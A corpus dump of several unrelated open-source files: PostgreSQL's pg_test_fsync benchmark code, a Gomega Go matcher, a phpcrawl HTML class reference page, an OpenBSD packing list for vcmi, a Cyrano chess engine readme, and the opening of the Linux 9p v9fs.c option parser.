handle_args(argc, argv);
/* Prevent leaving behind the test file */
pqsignal(SIGINT, signal_cleanup);
pqsignal(SIGTERM, signal_cleanup);
#ifndef WIN32
pqsignal(SIGALRM, process_alarm);
#endif
#ifdef SIGHUP
/* Not defined on win32 */
pqsignal(SIGHUP, signal_cleanup);
#endif
prepare_buf();
test_open();
/* Test using 1 XLOG_BLCKSZ write */
test_sync(1);
/* Test using 2 XLOG_BLCKSZ writes */
test_sync(2);
test_open_syncs();
test_file_descriptor_sync();
test_non_sync();
unlink(filename);
return 0;
}
static void
handle_args(int argc, char *argv[])
{
static struct option long_options[] = {
{"filename", required_argument, NULL, 'f'},
{"secs-per-test", required_argument, NULL, 's'},
{NULL, 0, NULL, 0}
};
int option; /* Command line option */
int optindex = 0; /* used by getopt_long */
unsigned long optval; /* used for option parsing */
char *endptr;
if (argc > 1)
{
if (strcmp(argv[1], "--help") == 0 || strcmp(argv[1], "-?") == 0)
{
printf(_("Usage: %s [-f FILENAME] [-s SECS-PER-TEST]\n"), progname);
exit(0);
}
if (strcmp(argv[1], "--version") == 0 || strcmp(argv[1], "-V") == 0)
{
puts("pg_test_fsync (PostgreSQL) " PG_VERSION);
exit(0);
}
}
while ((option = getopt_long(argc, argv, "f:s:",
long_options, &optindex)) != -1)
{
switch (option)
{
case 'f':
filename = pg_strdup(optarg);
break;
case 's':
errno = 0;
optval = strtoul(optarg, &endptr, 10);
if (endptr == optarg || *endptr != '\0' ||
errno != 0 || optval != (unsigned int) optval)
{
pg_log_error("invalid argument for option %s", "--secs-per-test");
fprintf(stderr, _("Try \"%s --help\" for more information.\n"), progname);
exit(1);
}
secs_per_test = (unsigned int) optval;
if (secs_per_test == 0)
{
pg_log_error("%s must be in range %u..%u",
"--secs-per-test", 1, UINT_MAX);
exit(1);
}
break;
default:
fprintf(stderr, _("Try \"%s --help\" for more information.\n"),
progname);
exit(1);
break;
}
}
if (argc > optind)
{
pg_log_error("too many command-line arguments (first is \"%s\")",
argv[optind]);
fprintf(stderr, _("Try \"%s --help\" for more information.\n"),
progname);
exit(1);
}
printf(ngettext("%u second per test\n",
"%u seconds per test\n",
secs_per_test),
secs_per_test);
#if PG_O_DIRECT != 0
printf(_("O_DIRECT supported on this platform for open_datasync and open_sync.\n"));
#else
printf(_("Direct I/O is not supported on this platform.\n"));
#endif
}
static void
prepare_buf(void)
{
int ops;
/* write random data into buffer */
for (ops = 0; ops < DEFAULT_XLOG_SEG_SIZE; ops++)
full_buf[ops] = random();
buf = (char *) TYPEALIGN(XLOG_BLCKSZ, full_buf);
}
static void
test_open(void)
{
int tmpfile;
/*
* test if we can open the target file
*/
if ((tmpfile = open(filename, O_RDWR | O_CREAT | PG_BINARY, S_IRUSR | S_IWUSR)) == -1)
die("could not open output file");
needs_unlink = 1;
if (write(tmpfile, full_buf, DEFAULT_XLOG_SEG_SIZE) !=
DEFAULT_XLOG_SEG_SIZE)
die("write failed");
/* fsync now so that dirty buffers don't skew later tests */
if (fsync(tmpfile) != 0)
die("fsync failed");
close(tmpfile);
}
static void
test_sync(int writes_per_op)
{
int tmpfile,
ops,
writes;
bool fs_warning = false;
if (writes_per_op == 1)
printf(_("\nCompare file sync methods using one %dkB write:\n"), XLOG_BLCKSZ_K);
else
printf(_("\nCompare file sync methods using two %dkB writes:\n"), XLOG_BLCKSZ_K);
printf(_("(in wal_sync_method preference order, except fdatasync is Linux's default)\n"));
/*
* Test open_datasync if available
*/
printf(LABEL_FORMAT, "open_datasync");
fflush(stdout);
#ifdef OPEN_DATASYNC_FLAG
if ((tmpfile = open(filename, O_RDWR | O_DSYNC | PG_O_DIRECT | PG_BINARY, 0)) == -1)
{
printf(NA_FORMAT, _("n/a*"));
fs_warning = true;
}
else
{
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
for (writes = 0; writes < writes_per_op; writes++)
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
if (lseek(tmpfile, 0, SEEK_SET) == -1)
die("seek failed");
}
STOP_TIMER;
close(tmpfile);
}
#else
printf(NA_FORMAT, _("n/a"));
#endif
/*
* Test fdatasync if available
*/
printf(LABEL_FORMAT, "fdatasync");
fflush(stdout);
#ifdef HAVE_FDATASYNC
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
for (writes = 0; writes < writes_per_op; writes++)
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
fdatasync(tmpfile);
if (lseek(tmpfile, 0, SEEK_SET) == -1)
die("seek failed");
}
STOP_TIMER;
close(tmpfile);
#else
printf(NA_FORMAT, _("n/a"));
#endif
/*
* Test fsync
*/
printf(LABEL_FORMAT, "fsync");
fflush(stdout);
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
for (writes = 0; writes < writes_per_op; writes++)
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
if (fsync(tmpfile) != 0)
die("fsync failed");
if (lseek(tmpfile, 0, SEEK_SET) == -1)
die("seek failed");
}
STOP_TIMER;
close(tmpfile);
/*
* If fsync_writethrough is available, test as well
*/
printf(LABEL_FORMAT, "fsync_writethrough");
fflush(stdout);
#ifdef HAVE_FSYNC_WRITETHROUGH
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
for (writes = 0; writes < writes_per_op; writes++)
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
if (pg_fsync_writethrough(tmpfile) != 0)
die("fsync failed");
if (lseek(tmpfile, 0, SEEK_SET) == -1)
die("seek failed");
}
STOP_TIMER;
close(tmpfile);
#else
printf(NA_FORMAT, _("n/a"));
#endif
/*
* Test open_sync if available
*/
printf(LABEL_FORMAT, "open_sync");
fflush(stdout);
#ifdef OPEN_SYNC_FLAG
if ((tmpfile = open(filename, O_RDWR | OPEN_SYNC_FLAG | PG_O_DIRECT | PG_BINARY, 0)) == -1)
{
printf(NA_FORMAT, _("n/a*"));
fs_warning = true;
}
else
{
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
for (writes = 0; writes < writes_per_op; writes++)
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
/*
* This can generate write failures if the filesystem has
* a large block size, e.g. 4k, and there is no support
* for O_DIRECT writes smaller than the file system block
* size, e.g. XFS.
*/
die("write failed");
if (lseek(tmpfile, 0, SEEK_SET) == -1)
die("seek failed");
}
STOP_TIMER;
close(tmpfile);
}
#else
printf(NA_FORMAT, _("n/a"));
#endif
if (fs_warning)
{
printf(_("* This file system and its mount options do not support direct\n"
" I/O, e.g. ext4 in journaled mode.\n"));
}
}
static void
test_open_syncs(void)
{
printf(_("\nCompare open_sync with different write sizes:\n"));
printf(_("(This is designed to compare the cost of writing 16kB in different write\n"
"open_sync sizes.)\n"));
test_open_sync(_(" 1 * 16kB open_sync write"), 16);
test_open_sync(_(" 2 * 8kB open_sync writes"), 8);
test_open_sync(_(" 4 * 4kB open_sync writes"), 4);
test_open_sync(_(" 8 * 2kB open_sync writes"), 2);
test_open_sync(_("16 * 1kB open_sync writes"), 1);
}
/*
* Test open_sync with different size files
*/
static void
test_open_sync(const char *msg, int writes_size)
{
#ifdef OPEN_SYNC_FLAG
int tmpfile,
ops,
writes;
#endif
printf(LABEL_FORMAT, msg);
fflush(stdout);
#ifdef OPEN_SYNC_FLAG
if ((tmpfile = open(filename, O_RDWR | OPEN_SYNC_FLAG | PG_O_DIRECT | PG_BINARY, 0)) == -1)
printf(NA_FORMAT, _("n/a*"));
else
{
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
for (writes = 0; writes < 16 / writes_size; writes++)
if (write(tmpfile, buf, writes_size * 1024) !=
writes_size * 1024)
die("write failed");
if (lseek(tmpfile, 0, SEEK_SET) == -1)
die("seek failed");
}
STOP_TIMER;
close(tmpfile);
}
#else
printf(NA_FORMAT, _("n/a"));
#endif
}
static void
test_file_descriptor_sync(void)
{
int tmpfile,
ops;
/*
* Test whether fsync can sync data written on a different descriptor for
* the same file. This checks the efficiency of multi-process fsyncs
* against the same file. Possibly this should be done with writethrough
* on platforms which support it.
*/
printf(_("\nTest if fsync on non-write file descriptor is honored:\n"));
printf(_("(If the times are similar, fsync() can sync data written on a different\n"
"descriptor.)\n"));
/*
* first write, fsync and close, which is the normal behavior without
* multiple descriptors
*/
printf(LABEL_FORMAT, "write, fsync, close");
fflush(stdout);
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
if (fsync(tmpfile) != 0)
die("fsync failed");
close(tmpfile);
/*
* open and close the file again to be consistent with the following
* test
*/
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
close(tmpfile);
}
STOP_TIMER;
/*
* Now open, write, close, open again and fsync This simulates processes
* fsyncing each other's writes.
*/
printf(LABEL_FORMAT, "write, close, fsync");
fflush(stdout);
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
close(tmpfile);
/* reopen file */
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
if (fsync(tmpfile) != 0)
die("fsync failed");
close(tmpfile);
}
STOP_TIMER;
}
static void
test_non_sync(void)
{
int tmpfile,
ops;
/*
* Test a simple write without fsync
*/
printf(_("\nNon-sync'ed %dkB writes:\n"), XLOG_BLCKSZ_K);
printf(LABEL_FORMAT, "write");
fflush(stdout);
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
close(tmpfile);
}
STOP_TIMER;
}
static void
signal_cleanup(int signum)
{
/* Delete the file if it exists. Ignore errors */
if (needs_unlink)
unlink(filename);
/* Finish incomplete line on stdout */
puts("");
exit(signum);
}
#ifdef HAVE_FSYNC_WRITETHROUGH
static int
pg_fsync_writethrough(int fd)
{
#ifdef WIN32
return _commit(fd);
#elif defined(F_FULLFSYNC)
return (fcntl(fd, F_FULLFSYNC, 0) == -1) ? -1 : 0;
#else
errno = ENOSYS;
return -1;
#endif
}
#endif
/*
* print out the writes per second for tests
*/
static void
print_elapse(struct timeval start_t, struct timeval stop_t, int ops)
{
double total_time = (stop_t.tv_sec - start_t.tv_sec) +
(stop_t.tv_usec - start_t.tv_usec) * 0.000001;
double per_second = ops / total_time;
double avg_op_time_us = (total_time / ops) * USECS_SEC;
printf(_(OPS_FORMAT), per_second, avg_op_time_us);
}
#ifndef WIN32
static void
process_alarm(int sig)
{
alarm_triggered = true;
}
#else
static DWORD WINAPI
process_alarm(LPVOID param)
{
/* WIN32 doesn't support alarm, so we create a thread and sleep here */
Sleep(secs_per_test * 1000);
alarm_triggered = true;
ExitThread(0);
}
#endif
| {
"pile_set_name": "Github"
} |
package matchers
import (
"fmt"
"github.com/onsi/gomega/format"
"github.com/onsi/gomega/internal/oraclematcher"
"github.com/onsi/gomega/types"
)
type OrMatcher struct {
Matchers []types.GomegaMatcher
// state
firstSuccessfulMatcher types.GomegaMatcher
}
func (m *OrMatcher) Match(actual interface{}) (success bool, err error) {
m.firstSuccessfulMatcher = nil
for _, matcher := range m.Matchers {
success, err := matcher.Match(actual)
if err != nil {
return false, err
}
if success {
m.firstSuccessfulMatcher = matcher
return true, nil
}
}
return false, nil
}
func (m *OrMatcher) FailureMessage(actual interface{}) (message string) {
// not the most beautiful list of matchers, but not bad either...
return format.Message(actual, fmt.Sprintf("To satisfy at least one of these matchers: %s", m.Matchers))
}
func (m *OrMatcher) NegatedFailureMessage(actual interface{}) (message string) {
return m.firstSuccessfulMatcher.NegatedFailureMessage(actual)
}
func (m *OrMatcher) MatchMayChangeInTheFuture(actual interface{}) bool {
/*
Example with 3 matchers: A, B, C
Match evaluates them: F, T, <?> => T
So match is currently T, what should MatchMayChangeInTheFuture() return?
Seems like it only depends on B, since currently B MUST change to allow the result to become F
Match eval: F, F, F => F
So match is currently F, what should MatchMayChangeInTheFuture() return?
Seems to depend on ANY of them being able to change to T.
*/
if m.firstSuccessfulMatcher != nil {
// one of the matchers succeeded.. it must be able to change in order to affect the result
return oraclematcher.MatchMayChangeInTheFuture(m.firstSuccessfulMatcher, actual)
} else {
// so all matchers failed.. Any one of them changing would change the result.
for _, matcher := range m.Matchers {
if oraclematcher.MatchMayChangeInTheFuture(matcher, actual) {
return true
}
}
return false // none of were going to change
}
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><title>Project Documentation / Classreference</title><meta
name="keywords" content="framework, API, manual, class reference, classreference, documentation" /><meta
name="description" content="The class reference contains the detailed description of how to use every class, method, and property." /><link
rel="stylesheet" type="text/css" media="screen" href="style.css"> <script name="javascript">function show_hide_examples()
{if(document.getElementById("examples").style.display=="none")
{document.getElementById("examples").style.display="";}
else
{document.getElementById("examples").style.display="none";}}</script> </head><body><div
id="outer"><h1>
<span>
Class:
PHPCrawlerResponseHeader
</span></h1><h2 id="head"><table
id="head_table"><tr><td
width="1%"><b>Author:</b></td><td
width="49%">-</td><td
width="1%"><b>Version:</b></td><td
width="49%">-</td></tr><tr><td
width="1%"><b>Package:</b></td><td
width="49%">phpcrawl</td><td
width="1%"><b>Category:</b></td><td
width="49%">-</td></tr></table></h2><div
id="section">Describes an HTTP response-header within the phpcrawl-system.</div><div
id="section">
<b>Description:</b><p>
-</p></div><div
id="section">
<b>Members:</b><p><table
id="method_list"><tr><th
colspan="3">Public Properties</th></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_content_encoding.htm" ><nobr>content_encoding</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The content-encoding as stated in the header.</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_content_length.htm" ><nobr>content_length</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The content-length as stated in the header.</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_content_type.htm" ><nobr>content_type</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The content-type</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_cookies.htm" ><nobr>cookies</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">All cookies found in the header</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_header_raw.htm" ><nobr>header_raw</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The raw HTTP-header as it was send by the server</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_http_status_code.htm" ><nobr>http_status_code</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The HTTP-statuscode</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_source_url.htm" ><nobr>source_url</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The URL of the website the header was recevied from.</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_transfer_encoding.htm" ><nobr>transfer_encoding</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The transfer-encoding as stated in the header.</td></tr></table><br></p></div><div
id="footer">Docs created with <a
href="http://phpclassview.cuab.de" target="_parent">PhpClassView</a></div></div></body></html> | {
"pile_set_name": "Github"
} |
@comment $OpenBSD$
bin/vcmibuilder
@bin bin/vcmiclient
@bin bin/vcmiserver
include/fl/
include/fl/Console.h
include/fl/Engine.h
include/fl/Exception.h
include/fl/Headers.h
include/fl/Operation.h
include/fl/defuzzifier/
include/fl/defuzzifier/Bisector.h
include/fl/defuzzifier/Centroid.h
include/fl/defuzzifier/Defuzzifier.h
include/fl/defuzzifier/IntegralDefuzzifier.h
include/fl/defuzzifier/LargestOfMaximum.h
include/fl/defuzzifier/MeanOfMaximum.h
include/fl/defuzzifier/SmallestOfMaximum.h
include/fl/defuzzifier/WeightedAverage.h
include/fl/defuzzifier/WeightedDefuzzifier.h
include/fl/defuzzifier/WeightedSum.h
include/fl/factory/
include/fl/factory/CloningFactory.h
include/fl/factory/ConstructionFactory.h
include/fl/factory/DefuzzifierFactory.h
include/fl/factory/FactoryManager.h
include/fl/factory/FunctionFactory.h
include/fl/factory/HedgeFactory.h
include/fl/factory/SNormFactory.h
include/fl/factory/TNormFactory.h
include/fl/factory/TermFactory.h
include/fl/fuzzylite.h
include/fl/hedge/
include/fl/hedge/Any.h
include/fl/hedge/Extremely.h
include/fl/hedge/Hedge.h
include/fl/hedge/Not.h
include/fl/hedge/Seldom.h
include/fl/hedge/Somewhat.h
include/fl/hedge/Very.h
include/fl/imex/
include/fl/imex/CppExporter.h
include/fl/imex/Exporter.h
include/fl/imex/FclExporter.h
include/fl/imex/FclImporter.h
include/fl/imex/FisExporter.h
include/fl/imex/FisImporter.h
include/fl/imex/FldExporter.h
include/fl/imex/FllExporter.h
include/fl/imex/FllImporter.h
include/fl/imex/Importer.h
include/fl/imex/JavaExporter.h
include/fl/norm/
include/fl/norm/Norm.h
include/fl/norm/SNorm.h
include/fl/norm/TNorm.h
include/fl/norm/s/
include/fl/norm/s/AlgebraicSum.h
include/fl/norm/s/BoundedSum.h
include/fl/norm/s/DrasticSum.h
include/fl/norm/s/EinsteinSum.h
include/fl/norm/s/HamacherSum.h
include/fl/norm/s/Maximum.h
include/fl/norm/s/NilpotentMaximum.h
include/fl/norm/s/NormalizedSum.h
include/fl/norm/t/
include/fl/norm/t/AlgebraicProduct.h
include/fl/norm/t/BoundedDifference.h
include/fl/norm/t/DrasticProduct.h
include/fl/norm/t/EinsteinProduct.h
include/fl/norm/t/HamacherProduct.h
include/fl/norm/t/Minimum.h
include/fl/norm/t/NilpotentMinimum.h
include/fl/rule/
include/fl/rule/Antecedent.h
include/fl/rule/Consequent.h
include/fl/rule/Expression.h
include/fl/rule/Rule.h
include/fl/rule/RuleBlock.h
include/fl/term/
include/fl/term/Accumulated.h
include/fl/term/Activated.h
include/fl/term/Bell.h
include/fl/term/Concave.h
include/fl/term/Constant.h
include/fl/term/Cosine.h
include/fl/term/Discrete.h
include/fl/term/Function.h
include/fl/term/Gaussian.h
include/fl/term/GaussianProduct.h
include/fl/term/Linear.h
include/fl/term/PiShape.h
include/fl/term/Ramp.h
include/fl/term/Rectangle.h
include/fl/term/SShape.h
include/fl/term/Sigmoid.h
include/fl/term/SigmoidDifference.h
include/fl/term/SigmoidProduct.h
include/fl/term/Spike.h
include/fl/term/Term.h
include/fl/term/Trapezoid.h
include/fl/term/Triangle.h
include/fl/term/ZShape.h
include/fl/variable/
include/fl/variable/InputVariable.h
include/fl/variable/OutputVariable.h
include/fl/variable/Variable.h
lib/libfuzzylite-static.a
lib/vcmi/
lib/vcmi/AI/
lib/vcmi/AI/libBattleAI.so
lib/vcmi/AI/libEmptyAI.so
lib/vcmi/AI/libStupidAI.so
lib/vcmi/AI/libVCAI.so
lib/vcmi/libminizip.so
@lib lib/vcmi/libvcmi.so.${LIBvcmi_VERSION}
share/applications/vcmiclient.desktop
share/doc/pkg-readmes/${FULLPKGNAME}
share/icons/hicolor/256x256/apps/vcmiclient.png
share/icons/hicolor/32x32/apps/vcmiclient.png
share/icons/hicolor/48x48/apps/vcmiclient.png
share/icons/hicolor/64x64/apps/vcmiclient.png
share/vcmi/
share/vcmi/Mods/
share/vcmi/Mods/vcmi/
share/vcmi/Mods/vcmi/Data/
share/vcmi/Mods/vcmi/Data/StackQueueLarge.png
share/vcmi/Mods/vcmi/Data/StackQueueSmall.png
share/vcmi/Mods/vcmi/Data/questDialog.png
share/vcmi/Mods/vcmi/Data/s/
@comment share/vcmi/Mods/vcmi/Data/s/std.verm
share/vcmi/Mods/vcmi/Data/s/std.verm
@comment share/vcmi/Mods/vcmi/Data/s/testy.erm
share/vcmi/Mods/vcmi/Data/s/testy.erm
share/vcmi/Mods/vcmi/Data/stackWindow/
share/vcmi/Mods/vcmi/Data/stackWindow/bonus-effects.png
share/vcmi/Mods/vcmi/Data/stackWindow/button-panel.png
share/vcmi/Mods/vcmi/Data/stackWindow/commander-abilities.png
share/vcmi/Mods/vcmi/Data/stackWindow/commander-bg.png
share/vcmi/Mods/vcmi/Data/stackWindow/icons.png
share/vcmi/Mods/vcmi/Data/stackWindow/info-panel-0.png
share/vcmi/Mods/vcmi/Data/stackWindow/info-panel-1.png
share/vcmi/Mods/vcmi/Data/stackWindow/info-panel-2.png
share/vcmi/Mods/vcmi/Data/stackWindow/spell-effects.png
share/vcmi/Mods/vcmi/Sprites/
share/vcmi/Mods/vcmi/Sprites/PortraitsLarge.json
share/vcmi/Mods/vcmi/Sprites/PortraitsSmall.json
share/vcmi/Mods/vcmi/Sprites/ScSelC.json
share/vcmi/Mods/vcmi/Sprites/buttons/
share/vcmi/Mods/vcmi/Sprites/buttons/commander.json
share/vcmi/Mods/vcmi/Sprites/buttons/commanderNormal.png
share/vcmi/Mods/vcmi/Sprites/buttons/commanderPressed.png
share/vcmi/Mods/vcmi/Sprites/buttons/resolution.json
share/vcmi/Mods/vcmi/Sprites/buttons/resolutionNormal.png
share/vcmi/Mods/vcmi/Sprites/buttons/resolutionPressed.png
share/vcmi/Mods/vcmi/Sprites/itpa.json
share/vcmi/Mods/vcmi/Sprites/mapFormatIcons/
share/vcmi/Mods/vcmi/Sprites/mapFormatIcons/vcmi1.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/
share/vcmi/Mods/vcmi/Sprites/stackWindow/cancel-normal.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/cancel-pressed.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/cancelButton.json
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-0.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-1.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-10.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-2.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-3.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-4.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-5.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-6.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-7.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-8.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-9.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/levels.json
share/vcmi/Mods/vcmi/Sprites/stackWindow/switchModeIcons.json
share/vcmi/Mods/vcmi/Sprites/stackWindow/upgrade-normal.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/upgrade-pressed.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/upgradeButton.json
share/vcmi/Mods/vcmi/mod.json
share/vcmi/config/
share/vcmi/config/ERMU_to_picture.json
share/vcmi/config/NEUTRAL.PAL
share/vcmi/config/artifacts.json
share/vcmi/config/battleStartpos.json
share/vcmi/config/battles_graphics.json
share/vcmi/config/bonuses.json
share/vcmi/config/bonuses_texts.json
share/vcmi/config/buildings5.json
share/vcmi/config/campaignMedia.json
share/vcmi/config/campaignSets.json
share/vcmi/config/campaign_regions.json
share/vcmi/config/commanders.json
share/vcmi/config/creatures/
share/vcmi/config/creatures/castle.json
share/vcmi/config/creatures/conflux.json
share/vcmi/config/creatures/dungeon.json
share/vcmi/config/creatures/fortress.json
share/vcmi/config/creatures/inferno.json
share/vcmi/config/creatures/necropolis.json
share/vcmi/config/creatures/neutral.json
share/vcmi/config/creatures/rampart.json
share/vcmi/config/creatures/special.json
share/vcmi/config/creatures/stronghold.json
share/vcmi/config/creatures/tower.json
share/vcmi/config/defaultMods.json
share/vcmi/config/factions/
share/vcmi/config/factions/castle.json
share/vcmi/config/factions/conflux.json
share/vcmi/config/factions/dungeon.json
share/vcmi/config/factions/fortress.json
share/vcmi/config/factions/inferno.json
share/vcmi/config/factions/necropolis.json
share/vcmi/config/factions/neutral.json
share/vcmi/config/factions/rampart.json
share/vcmi/config/factions/stronghold.json
share/vcmi/config/factions/tower.json
share/vcmi/config/filesystem.json
share/vcmi/config/fonts.json
share/vcmi/config/gameConfig.json
share/vcmi/config/heroClasses.json
share/vcmi/config/heroes/
share/vcmi/config/heroes/castle.json
share/vcmi/config/heroes/conflux.json
share/vcmi/config/heroes/dungeon.json
share/vcmi/config/heroes/fortress.json
share/vcmi/config/heroes/inferno.json
share/vcmi/config/heroes/necropolis.json
share/vcmi/config/heroes/rampart.json
share/vcmi/config/heroes/special.json
share/vcmi/config/heroes/stronghold.json
share/vcmi/config/heroes/tower.json
share/vcmi/config/mainmenu.json
share/vcmi/config/mapOverrides.json
share/vcmi/config/objects/
share/vcmi/config/objects/creatureBanks.json
share/vcmi/config/objects/dwellings.json
share/vcmi/config/objects/generic.json
share/vcmi/config/objects/moddables.json
share/vcmi/config/objects/rewardable.json
share/vcmi/config/obstacles.json
share/vcmi/config/resolutions.json
share/vcmi/config/resources.json
share/vcmi/config/schemas/
share/vcmi/config/schemas/artifact.json
share/vcmi/config/schemas/bonus.json
share/vcmi/config/schemas/creature.json
share/vcmi/config/schemas/faction.json
share/vcmi/config/schemas/hero.json
share/vcmi/config/schemas/heroClass.json
share/vcmi/config/schemas/mapHeader.json
share/vcmi/config/schemas/mod.json
share/vcmi/config/schemas/object.json
share/vcmi/config/schemas/objectTemplate.json
share/vcmi/config/schemas/objectType.json
share/vcmi/config/schemas/settings.json
share/vcmi/config/schemas/spell.json
share/vcmi/config/schemas/template.json
share/vcmi/config/schemas/townBuilding.json
share/vcmi/config/schemas/townSiege.json
share/vcmi/config/schemas/townStructure.json
share/vcmi/config/sp_sounds.json
share/vcmi/config/spells/
share/vcmi/config/spells/ability.json
share/vcmi/config/spells/adventure.json
share/vcmi/config/spells/offensive.json
share/vcmi/config/spells/other.json
share/vcmi/config/spells/timed.json
share/vcmi/config/startres.json
share/vcmi/config/terrainViewPatterns.json
share/vcmi/config/terrains.json
share/vcmi/config/translate.json
@exec %D/bin/update-desktop-database
@unexec-delete %D/bin/update-desktop-database
@exec %D/bin/gtk-update-icon-cache -q -t %D/share/icons/hicolor
@unexec-delete %D/bin/gtk-update-icon-cache -q -t %D/share/icons/hicolor
| {
"pile_set_name": "Github"
} |
Cyrano v 0.1 is derived from Gerbil
Cyrano is compatible with Winboard 2 & UCI protocol
Default hash size is 128 MB
Default book name is test.pbk (PolyGlot format)
Command line arguments :
Usage: cyrano [flags]
-? | Usage
-bf<F> | name of the opening book to use
-ht<N> | size of the transposition tables in MB (default=32)
-bs<F> | name of the directory of the Scorpio bitbases
-hp<N> | size of the pawn hash table in bytes
-p | Tell the engine to reduce its system priority.
-r<B> | {0 | 1} disable of enable the auto resign feature
-t<F> <N> | Profile a position for N seconds, F is the FEN string
-b<B> | {0 | 1} disable or enable the use of an opening book
example : "Cyrano.exe -ht 128 -bs c:/tb/egbbs_3_4"
Copyrights
----------
Gerbil Copyright (c) 2001, Bruce Moreland. All rights reserved.
magicmoves Copyright (C) 2007 Pradyumna Kannan.
move gen (c) Jacob Hales
Cyrano Copyright (c) 2007 Harald JOHNSEN
PolyGlot Copyright 2004-2006 Fabien Letouzey.
Bitbases Scorpio bitbases from Daniel Shawul
| {
"pile_set_name": "Github"
} |
/*
* linux/fs/9p/v9fs.c
*
* This file contains functions assisting in mapping VFS to 9P2000
*
* Copyright (C) 2004-2008 by Eric Van Hensbergen <[email protected]>
* Copyright (C) 2002 by Ron Minnich <[email protected]>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2
* as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to:
* Free Software Foundation
* 51 Franklin Street, Fifth Floor
* Boston, MA 02111-1301 USA
*
*/
#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/module.h>
#include <linux/errno.h>
#include <linux/fs.h>
#include <linux/sched.h>
#include <linux/parser.h>
#include <linux/idr.h>
#include <linux/slab.h>
#include <net/9p/9p.h>
#include <net/9p/client.h>
#include <net/9p/transport.h>
#include "v9fs.h"
#include "v9fs_vfs.h"
#include "cache.h"
static DEFINE_SPINLOCK(v9fs_sessionlist_lock);
static LIST_HEAD(v9fs_sessionlist);
struct kmem_cache *v9fs_inode_cache;
/*
* Option Parsing (code inspired by NFS code)
* NOTE: each transport will parse its own options
*/
enum {
/* Options that take integer arguments */
Opt_debug, Opt_dfltuid, Opt_dfltgid, Opt_afid,
/* String options */
Opt_uname, Opt_remotename, Opt_cache, Opt_cachetag,
/* Options that take no arguments */
Opt_nodevmap,
/* Cache options */
Opt_cache_loose, Opt_fscache, Opt_mmap,
/* Access options */
Opt_access, Opt_posixacl,
/* Error token */
Opt_err
};
static const match_table_t tokens = {
{Opt_debug, "debug=%x"},
{Opt_dfltuid, "dfltuid=%u"},
{Opt_dfltgid, "dfltgid=%u"},
{Opt_afid, "afid=%u"},
{Opt_uname, "uname=%s"},
{Opt_remotename, "aname=%s"},
